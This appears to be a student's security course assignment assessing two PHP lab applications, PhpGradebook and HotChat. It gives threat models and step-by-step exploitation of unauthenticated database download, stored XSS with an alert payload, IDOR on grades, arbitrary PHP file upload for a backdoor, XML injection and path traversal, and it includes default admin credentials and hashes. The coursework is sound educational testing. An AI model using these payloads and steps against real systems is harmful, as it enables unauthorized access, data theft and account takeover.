Scott Ning SE 526 Assignment 2 Assessment of PhpGradebook THREAT MODELING Application Overview The PhpGradebook application provides users, such as students and administrators, with the ability to log in, view, or input grade information. The administration area, however, leverages more functionality for modifying such data, which in turn, showcases more inputs and outputs that may be possible vulnerabilities. Interesting Areas The administrator dashboard features database downloading and uploading functionalities upon administrator login. o This may pose for possible vulnerabilities, such as the uploading of other files to the same server/application, or the accessing of these functionalities without authentication. By modifying post/get/request parameters, users can alter the file being uploaded and therefore potentially access and run this file. By accessing this functionality and other database-modifying functionalities (through the URL and possibly with easily accessible post/get parameters) without authentication cookies, an unauthenticated user can easily retrieve the database data. The administrator area allows for the editing of information through many inputs such as textbox inputs in the editing grades section. o The possible vulnerabilities regarding these inputs is that users can possibly enter HTML and Javascript code that saves directly to the database, which may be viewed executed, behind the scenes, by other users with this data reflected on different areas of the application. Users can also possibly try to access this functionality without logging in or being authenticated; by sending the requests with appropriate parameters. By inputting and storing malicious HTML and Javascript code, an attacker can trick users to execute his or her script without knowing. This cross site scripting strategy can potentially have the users redirected to an attacker’s server, which will allows the attacker to steal cookies or authentication information. By accessing this functionality possibly through the appropriate URL and parameters (without being authenticated), a user can easily modify data that they should not be allowed to access. A normal user (student) has a couple of input/output areas as well. A main functionality is the view grades area, which accepts a few parameters as inputs and displays grade data based on this fed information. o The possible vulnerabilities are the accessing of other data or another user’s data through the modification of the sent parameters. The possibility of accessing this functionality without authentication is also present. 2 By modifying the post/get parameters while accessing the appropriate URL, a user can possibly access such data that they should not be able to access. By accessing this functionality possibly through the appropriate URL and parameters (without being authenticated), a user can easily view data that they should not be allowed to access. VULNERABILITY CLASS IDENTIFICATION Numerous vulnerabilities may exist within the PhpGradeBook application. Through source-based and blackbox assessment, several vulnerability classes can be identified. Below is the relevant information of the different classes of possible vulnerability types and the details pertaining to that each of those vulnerability classes. Remote File Inclusion (Uploading of malicious files/scripts) Relevant source code: admin/index.php (lines 78 - 81 and 220 - 280) Post request to URL: /phpGradeBook/admin/index.php?restore=sql o Assumes the parameters: “restore” with value of “sql” (Type URL) “adminuser” with the value of the administrator’s user name (Type Cookie) “adminpass” with the value of the administrator’s encrypted password (Type Cookie) “uploadfile” with a modified value (such as the representation of a gif file) to attempt to upload different file types such as .txt, .html, .php, .jpg, files to see if the uploading of other file types is possible. (Type Body) Insufficient Function Authorization (To retrieve/modify sensitive data) Relevant source code: admin/index.php (lines 78 - 81 and 220 - 280) Post request to URL: /phpGradeBook/admin/index.php? restore=sql o See if database can be uploaded by directly accessing this URL without logging in (Without the existence of the cookies, “administrator” and “administrator”). Therefore, assuming the parameters: “restore” with value “sql” (Type URL) “uploadfile” with value of the contents of a full sql backup script (which can be created by the database backup/download functionality). (Type Body) Relevant source code: admin/functions.inc.php (lines 1075 - 1105) Get request to URL: /phpGradeBook/admin/index.php?action=SaveSQL o See if database can be downloaded by directly accessing this URL without logging in (Without the existence of the cookies, “adminuser” and “adminpass”). Therefore, assuming the parameter: “action” with value “SaveSQL” (Type URL) Relevant source code: admin/process.php (lines 127 - 142) 3 Get request to URL: /phpGradeBook/admin/process.php?action=AddStudent&name=testName&stud_id=testStuden tId&password=testPass&class_name=SE%20526&notes=testNotes o See if a user can be created without administrator authentication. Assume parameters: “action” with appropriate value “AddStudent” (Type URL) “name” with appropriate value such as “testName” (Type URL) “stud_id” with appropriate value such as “testStudentId” (Type URL) “password” with appropriate value such as “testPass” (Type URL) “class_name” with appropriate value such as “SE%20526” (Type URL) Cross-site Scripting (Reflective XXS/Content Injection) Relevant source code: admin/index.php (lines 423 - 434) Post request to URL: /phpGradeBook/admin/index.php?action= EditGrade o See if HTML is stripped or not. Assume parameters: “action” with value of “EditGrade” (Type URL) “adminuser” with the value of the administrator’s user name (Type Cookie) “adminpass” with the value of the administrator’s encrypted password (Type Cookie) “EditClass” with appropriate value such as “SE+526” (Type Body) “Student” with appropriate value such as “Grade_1” (Type Body) “EditGrade%5B%5D” with value containing HTML that can trigger Javascript such as “%3Cimg+src%3D1+onerror%3Dalert%281%29%3E” (Type Body) “EditGrade%5B%5D” with appropriate value such as “20” (Type Body) “EditGrade%5B%5D” with appropriate value such as “40” (Type Body) If injection is a success, see if the output is reflected: Relevant source code: index.php (lines 79 - 141) Post request to URL: /phpGradeBook/index.php o Assume parameters: “class” with appropriate value (same value of the class that was attacked), such as “SE+526” (Type Body) “action” with value “View+Class+Grades” (Type Body) Insufficient Authentication (Bypassing implicit security expectations by accessing restricted data with improper authentication) Relevant source code: index.php (lines 79 - 141) Post request to URL: /phpGradeBook/index.php o Assume parameters: “StudID” with value of the logged-in student’s ID, such as “14112” (Type Cookie) “StudPass” with the value of the logged-in student’s encrypted password (Type Cookie) “StudID” with a value of another student’s “StudID” (Type Body) “UseTerm” with an empty value (Type Body) “action” with value “View+Class+Grades” (Type Body) “class” with appropriate value such as “SE+526” (Type Body) 4 VULNERABILITY EXPLOITATION Based upon the vulnerabilities identified earlier, exploitations were possible, allowing attackers to access the application’s sensitive data and functionality. Below are the processes and levels of access that can be potentially gained. Insufficient Function Authorization As outlined previously in the identification section of this assessment, the downloading of the database is fully exploitable through the exact get request and specified parameter. Access Gained: Easily access the application’s database, without authentication, to view sensitive data such as user information and passwords. Steps: 1. Access the URL: “/phpGradeBook/admin/index.php?action=SaveSQL” from the browser. 2. Database will be downloaded. Similarly, as outlined previously, the creation on a user without authentication is also exploitable. Access Gained: Easily create a user account, which was only creatable within the administrator’s area, without authentication. Steps: 1. Access the URL with relevant new user information in the query strings: “/phpGradeBook/admin/process.php?action=AddStudent&name=testName&stud_id=testStude ntId&password=testPass&class_name=SE%20526&notes=testNotes” from the browser. 2. The page will reflectively output a success message indicating the user is created. Cross-site Scripting Access Gained: The injection of Javascript code that can be executed by any user unknowingly. This can then be potentially used to redirect users to an attacker’s server, which will allow the attacker to steal cookies or session/authentication information. With such information, attackers can log into the account, easily change the password, and take ownership of the account. Steps: 1. Access the URL: “/phpGradeBook/admin/” from the browser. 2. Log in as an administrator a. “Admin Name” = admin and “Admin Pass” = superadminpass b. Or create valid authentication cookies, “adminuser” and “adminpass” (Login/cookie information can be retrieved from the downloading the database, shown from the previous exploit; adminuser=”admin” and adminpass=” 21232f297a57a5a743894a0e4a801fc3”) 3. Access the URL: “/phpGradeBook/admin/index.php?action=ViewAllGrades” from the browser. 4. Modify/inject Javascript code such as “<img src=1 onerror=alert(1)>” in a student’s grade textbox (textbox with name=”EditGrade[]”). 5. Click the “Commit Edit” button for that student. 6. Access the URL: “phpGradeBook/index.php” from the browser. 7. Click the “View Class Grades” button, with the modified class selected. 8. Confirm Javascript code is executed; check if alert message is shown, in this case. a. Cookies pertaining to this application can be accessed through Javascript. 5 Note: To shorten the steps above, Post requests can be sent directly instead. The first 5 steps can be similarly achieved by sending a post request to “/phpGradeBook/admin/index.php?action= EditGrade” with the exact parameters outlined previously, in the identification section of this assessment. Insufficient Authentication Access Gained: The ability to view the specific detailed information of another user’s grades (data that is not supposed to be viewable unless logged in as that specific user). Steps: 1. Similarly outlined previously, in the identification section of this assessment, send a post request to the URL “/phpGradeBook/index.php” with the following parameters: a. Type=Cookie, Name=StudID, Value=14112 b. Type=Cookie, Name=StudPass, Value=a029d0df84eb5549c641e04a9ef389e5 c. Type=Body, Name=StudID, Value=<AnotherUser’sId…such as “11214”> d. Type=Body, Name= UseTerm, empty value e. Type=Body, Name= action, Value=View+Student+Grades f. Type=Body, Name= Class, Value=SE+526 2. Confirm that another student’s detailed grade information is shown. Assessment of HotChat THREAT MODELING Application Overview The HotChat application provides users with the ability to upload a custom emoticon image and chat with an inputted nickname and room name. These and other inputs, specifically the uploading of a file, are known possible vulnerabilities. Interesting Areas The homepage allows for the uploading of an emoticon (assumed to be a .gif file) image file. o This poses the possible vulnerability of being able to upload and access any file type. By being able to upload any file type, an attacker can possibly upload and run malicious scripts, such as ones that can be run within a PHP file, that can do various actions such as retrieve or modify data. These scripts essentially create a backdoor, allowing the attacker much control over the application. XML files, populated through user inputs, are used to store chat information. o XML injection is a possible vulnerability due to the ability to populate data in those XML files. By being able to input malicious data in input parameters such as query strings, post or get requests, or textboxes, users can insert malicious data in XML files. This can be used to store invalid data and also potentially cause the XML file to be invalid. 6 The application uses .hc files, which can be seen by any user, to store user nickname information. o The functionality of creating or modifying such files, through user inputted requests, can allow the possibility of creating these files in unexpected directories within the server. By being able to input the filename and content (nickname) written within that file, an attacker can potentially create the file in other directories as well as insert malicious text in the file. VULNERABILITY IDENTIFICATION Remote File Inclusion Relevant source code: cadastra_sigla.php (lines 31 - 62) Post request to URL: /hotchat/cadastra_sigla.php o Assume parameters: “sigla” with appropriate parameter such as “test” (Type Body) “imagem” with a modified value of a malicious file (such as the representation/contents/scripts of a PHP file) to attempt to upload different file to see if the uploading of other file types is possible. (Type Body) If upload of malicious file is a success, see if the output is reflected/file is viewable: Relevant source code: index.php (lines 79 - 141) Get request to URL: /hotchat/chats/emoticons/MaliciouslyUploadedFile.php Get request to URL: /hotchat/chats/emoticons/ (to take this one step further and see if list of files is viewable) XML Injection Relevant source code: index.php (lines 64 - 71) Get request to URL: /hotchat/cadastra.php?nick_escritor=</NICK><SCOTT>hacked</SCOTT><NICK>&frase_escritor= chatText&room_escritor=someRoomXmlFileThatExistsInTheChatDirectory o Assume parameters: “nick_escritor” with a malicious value of the tags and data that should be injected, such as, in this scenario, “%3C/NICK%3E%3CSCOTT%3Ehacked%3C/SCOTT%3E%3CNICK%3E” (Type URL) “frase_escritor” with appropriate value such as “chatText” (Type URL) “room_escritor” with appropriate value such as “someRoomXmlFileThatExistsInTheChatDirectory” (Type URL) Path Traversal Relevant source code: index.php (lines 9 – 17 and 45 - 50) Get request to URL: /hotchat/chat_users.php?nick=testNick&room=../test&operation=testOperation o Assume parameters: “nick” with value of text to be saved in file, such as “testNick” (Type URL) 7 “room” with a malicious value of file name and the levels of directories to traverse, such as “../test” (Type URL) “operation” with the value of “testOperation” (Type URL) VULNERABILITY EXPLOITATION Remote File Inclusion Access Gained: The ability to upload any file type, will allow an attacker to upload and run malicious scripts that can do various actions such as retrieve or modify data. These scripts essentially create a backdoor, allowing the attacker much control over the entire application. The attacker can also potentially upload a shell and execute system commands through that shell. Steps: 1. Access the URL “/hotchat/cadastra_sigla.php” from the browser. 2. Enter into the “Text:” textbox the value of “test”. 3. Choose a local PHP file such as “test.php” to upload by clicking the “Choose File” button. 4. Click the “Send!” button. 5. Access the URL “hotchat/chats/emoticons/” from the browser. 6. Confirm that your file is successfully uploaded and exists on the server by seeing it on the list of files. 7. Execute/view your script by accessing the URL” hotchat/chats/emoticons/test.php” from your browser. XML Injection Access Gained: Attackers can insert malicious data in XML files, injecting invalid data and also potentially causing the XML file to be invalid. When the application or users retrieve data from this XML, they will retrieve erroneous information, or worse, if the file becomes invalid, they will see errors retrieving such data. Steps: 1. Access the URL “/hotchat/cadastra.php?nick_escritor=</NICK><SCOTT>hacked</SCOTT><NICK>&frase_escritor =chatText&room_escritor=someRoomXmlFileThatExistsInTheChatDirectory” from the browser. a. Or send a get request to the URL “/hotchat/cadastra.php” with the following parameters: i. “nick_escritor” with the value of “%3C/NICK%3E%3CSCOTT%3Ehacked%3C/SCOTT%3E%3CNICK%3E” (Type URL) ii. “frase_escritor” with the value of “chatText” (Type URL) iii. “room_escritor” with the value of “someRoomXmlFileThatExistsInTheChatDirectory” (Type URL) 2. Confirm that the injected data/tags, “<SCOTT>hacked</SCOTT>”, are present within the returned page and XML file. a. The XML file can be accessed through this URL within the browser: i. “/hotchat/chats/someRoomXmlFileThatExistsInTheChatDirectory.xml” 8 Path Traversal Access Gained: Attackers can create a file and write any content they want in an unintended directory within the server. Steps: 1. Access the URL “/hotchat/chat_users.php?nick=testNick&room=../test&operation=testOperation” from the browser. a. Or send a get request to the URL “/hotchat/chat_users.php” with the following parameters: i. “nick” with value of “testNick” (Type URL) ii. “room” with the value of “../test” (Type URL) iii. “operation” with the value of “testOperation” (Type URL) 2. Confirm that the new file exists in this unintended directory by accessing this URL from within the browser: “/hotchat/test_users.hc” 3. Confirm that the content of “testNick” is present in that file, on your browser’s screen.